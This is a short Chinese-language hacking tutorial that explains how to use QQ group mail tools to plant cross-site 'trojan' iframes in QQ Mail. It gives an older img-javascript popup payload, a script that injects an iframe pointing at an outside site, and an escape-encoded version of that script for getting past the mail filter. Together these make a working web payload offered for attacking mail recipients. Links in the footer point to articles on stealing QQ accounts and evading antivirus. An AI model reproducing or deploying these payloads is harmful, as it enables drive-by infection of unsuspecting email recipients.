|
[图文]利用QQ群发邮件跨站挂马
记得以前搞博客跨站挂马!
是利用下面这段弹窗的:
<img src=javascript:open('http://www.slenk.net','幽月','width=400,height=300')>现在漏 洞被封啦!
下面搞QQ邮箱挂马:
大家可以利用QQ群发工具或软件来利用:
这是新漏洞!
这是跨站的代码。可以直接支持JS 但QQ有过滤空格,相信大家应该明白这一点。空格被转换成“ ” “ ”在HTML下代表空格。
源代码:
<script>document.write("<iframe src=http://www.slenk.net width=100% height=400></iframe><br>十三教程测试。")</script><script>
JS加密网:
http://www.webmasterhome.cn/tool/Encode.asp
加密后的代码:
<script>document.write(unescape('%3Cscript%3Edocument.write%28%22%3Ciframe%20src%3Dhttp%3A//www.slenk.net%20width%3D100%25%20height%3D400%3E%3C/iframe%3E%3Cbr%3E%u5341%u4E09%u6559%u7A0B%u6D4B%u8BD5%u3002%22%29%3C/script%3E%3Cscript%3E'))</script>
| 如何绕过《QQ医生》的查杀 | 12-26 |
| QQ盗号软件后门分析与反击 | 10-26 |
| 防止QQ密码被破解 让你安心上QQ | 10-15 |
| 你的QQ号和Q币是如何被盗的! | 10-15 |
| QQ也来玩0day漏洞(杂志版带执行) | 09-01 |
| QQ积分游戏漏洞!80个积分就能做 | 08-27 |
| QQ 0day漏洞工具利用 | 08-17 |
| QQ所有文件和目录详细分析 | 07-02 |
| 选个好密码 黑客窃取QQ常用密码排 | 07-02 |
| 腾讯QQ聊天窗口漏洞安全测试报告 | 06-18 |
| 如何准确识别QQ盗号两大陷阱 | 06-05 |
| 如何禁止他人上QQ!! | 06-02 |
您现在的位置: